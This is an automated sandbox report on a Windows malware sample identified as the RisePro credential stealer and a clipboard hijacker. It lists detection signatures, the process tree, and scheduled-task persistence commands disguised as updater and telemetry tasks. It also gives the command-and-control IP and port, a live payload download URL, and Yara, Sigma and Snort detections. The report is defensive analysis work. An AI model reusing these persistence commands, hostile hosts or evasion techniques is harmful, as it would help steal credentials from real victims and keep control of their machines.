Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1446851
MD5:ee40081ecc9d262a6afb70e92d9092f2
SHA1:4a6d1f93c7e2907e985ba305f9a23a1ff1e413c2
SHA256:44f26c626214bd52d8f3b60c149ff03eaeb8d31ae552b3140c666680d9bf096d
Tags:exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EE40081ECC9D262A6AFB70E92D9092F2)
    • RegSvcs.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 4944 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • schtasks.exe (PID: 7132 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6020 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • q2xutezn4kFdLk2viqDb.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
        • schtasks.exe (PID: 7116 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 4048 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 4268 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSIUpdaterV2.exe (PID: 1196 cmdline: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • oobeldr.exe (PID: 736 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 3004 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdobeUpdaterV2.exe (PID: 5548 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • AdobeUpdaterV2.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • EdgeMS2.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\3mPJKgsigfIE_SLZsizIH3r.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
    • 0x1354:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
    00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
    • 0x1354:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
    00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    Click to see the 11 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
      8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
      • 0x1554:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
      22.2.EdgeMS2.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
        22.2.EdgeMS2.exe.400000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
        • 0x6c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
        Click to see the 16 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4268, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7008, ProcessName: RegSvcs.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4944, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
        Sigma detected: Suspicious Add Scheduled Task Parent
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe, ParentProcessId: 1608, ParentProcessName: q2xutezn4kFdLk2viqDb.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 7116, ProcessName: schtasks.exe
        Sigma detected: Suspicious Schtasks From Env Var Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe, ParentProcessId: 1608, ParentProcessName: q2xutezn4kFdLk2viqDb.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 7116, ProcessName: schtasks.exe

        Snort Signatures

        Timestamp:05/23/24-23:33:01.044471
        SID:2046266
        Source Port:50500
        Destination Port:49730
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:07.849352
        SID:2046269
        Source Port:49730
        Destination Port:50500
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:14.719693
        SID:2046266
        Source Port:50500
        Destination Port:49734
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:02.973535
        SID:2046268
        Source Port:49730
        Destination Port:50500
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:00.476492
        SID:2049060
        Source Port:49730
        Destination Port:50500
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:06.681318
        SID:2019714
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:05/23/24-23:33:13.613905
        SID:2049660
        Source Port:50500
        Destination Port:49730
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-23:33:01.285787
        SID:2046267
        Source Port:50500
        Destination Port:49730
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: file.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://185.172.128.82/server/k/l2.exeAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeReversingLabs: Detection: 65%
        Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exeReversingLabs: Detection: 65%
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exeReversingLabs: Detection: 65%
        Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exeReversingLabs: Detection: 65%
        Source: C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exeReversingLabs: Detection: 65%
        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeReversingLabs: Detection: 65%
        Multi AV Scanner detection for submitted file
        Source: file.exeReversingLabs: Detection: 28%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: file.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFADD20 CryptReleaseContext,0_2_6CFADD20
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFADEE0 CryptReleaseContext,0_2_6CFADEE0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFADE00 CryptGenRandom,__CxxThrowException@8,0_2_6CFADE00
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFAD9D0 CryptAcquireContextA,GetLastError,0_2_6CFAD9D0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFADBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_6CFADBB0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFD35E0 CryptReleaseContext,0_2_6CFD35E0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFAD7F0 CryptReleaseContext,0_2_6CFAD7F0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFAD7D3 CryptReleaseContext,0_2_6CFAD7D3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C6B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree,2_2_004C6B00
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: file.exe, 00000000.00000002.1650745382.0000000005238000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1659746305.0000000005A30000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000050AD000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, 00000000.00000002.1646603659.0000000000414000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000002.00000002.4086941629.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: file.exe, 00000000.00000002.1659746305.0000000005AEA000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.000000000516A000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,2_2_004C6000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,2_2_004E6770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00493F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,2_2_00493F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00431F9C FindClose,FindFirstFileExW,GetLastError,2_2_00431F9C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00432022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,2_2_00432022
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,2_2_004938D0
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ABD8
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_033941DC
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ABD0
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339AF08
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339AF00
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ADF8
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ADF0
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_03399C04
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ACE8
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_0339ACE0
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 062E3B32h0_2_062E3A80
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 062E3B32h0_2_062E3A7B
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_062E3748
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_062E3750
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 062E333Ah0_2_062E3288
        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 062E333Ah0_2_062E3283

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49730 -> 185.172.128.136:50500
        Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.4:49730
        Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 185.172.128.136:50500 -> 192.168.2.4:49730
        Source: TrafficSnort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.4:49730 -> 185.172.128.136:50500
        Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49733 -> 185.172.128.82:80
        Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49730 -> 185.172.128.136:50500
        Source: TrafficSnort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 185.172.128.136:50500 -> 192.168.2.4:49730
        Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.4:49734
        Source: global trafficTCP traffic: 192.168.2.4:49730 -> 185.172.128.136:50500
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 23 May 2024 21:33:06 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Wed, 22 May 2024 06:47:19 GMTConnection: keep-aliveETag: "664d94f7-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 